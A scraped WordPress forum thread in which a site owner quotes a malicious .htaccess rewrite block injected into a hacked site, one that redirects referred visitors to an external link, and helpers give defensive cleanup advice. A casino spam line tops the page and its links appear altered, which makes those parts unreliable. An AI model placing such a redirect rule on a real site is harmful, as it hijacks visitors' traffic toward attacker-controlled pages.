Joy jili casino login register mobile app.Claim Your Free 999 Pesos Bonus Today

physty
(@physty)

11 years, 8 months ago

My htacess file at the root has been modified with the following code
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^https://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ https://link-removed?h=1878600 [L,R]

Also wp-login php file has been modified
Can anyone help me? i have cleaned the issue once but it has come back

Viewing 8 replies - 1 through 8 (of 8 total)

@mercime
(@mercime)

11 years, 8 months ago

You need to start working your way through these resources:
https://codex.www.ads-software.com/FAQ_My_site_was_hacked
https://www.ads-software.com/support/topic/268083#post-1065779
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
https://ottopress.com/2009/hacked-wordpress-backdoors/

Additional Resources:
https://sitecheck.sucuri.net/scanner/
https://www.unmaskparasites.com/
https://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html

Where are you hosted?

Thread Starter physty
(@physty)

11 years, 8 months ago

thanks guys,
i am hosted at OVH.
I will look at the links and plugin

@mercime
(@mercime)

11 years, 8 months ago

@physty please do not download pirated plugins/themes from such sites as those could be compromised already i.e., virus etc.

TrueFalse
(@truefalse)

11 years, 8 months ago

1. Find web-shell. Check the logs to the server.
2. Check your website for vulnerabilities to exploit.
3. Change all passwords.
4. Change the access rights to files and directories on a read-only. (although this can bring you some inconvenience.)
5. Remove all the consequences of hacking.

Thread Starter physty
(@physty)

11 years, 8 months ago

How do i check the first item please?

@mercime
(@mercime)

11 years, 8 months ago

Have you gone through the list I gave you? e.g. https://sitecheck.sucuri.net/scanner/

Have you contacted tech support about your issue for assistance?

Thread Starter physty
(@physty)

11 years, 8 months ago

YEs i have. It did not find anything.
I have contacted OVH and am still waiting for their reply. I must say that in the meantime my problem has been fixed and has not reoccured. I have installed Better WP Security plugin. The plugin has detected a list of 404 errors found. Is that a problem?

@mercime
(@mercime)

11 years, 8 months ago

The plugin has detected a list of 404 errors found. Is that a problem?

It’s a problem if the 404 errors are within your installation. Delete that old .htaccess file then go to Settings > Permalnks and choose setting other than default and Save. Check new .htaccess file and see if content is per https://codex.www.ads-software.com/Using_Permalinks#Creating_and_editing_.28.htaccess.29

If the 404 errors are links to external sites, then identify the links and change/delete such links.

Viewing 8 replies - 1 through 8 (of 8 total)

The topic ‘My website has been hacked twice in 2 days’ is closed to new replies.

My website has been hacked twice in 2 days

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics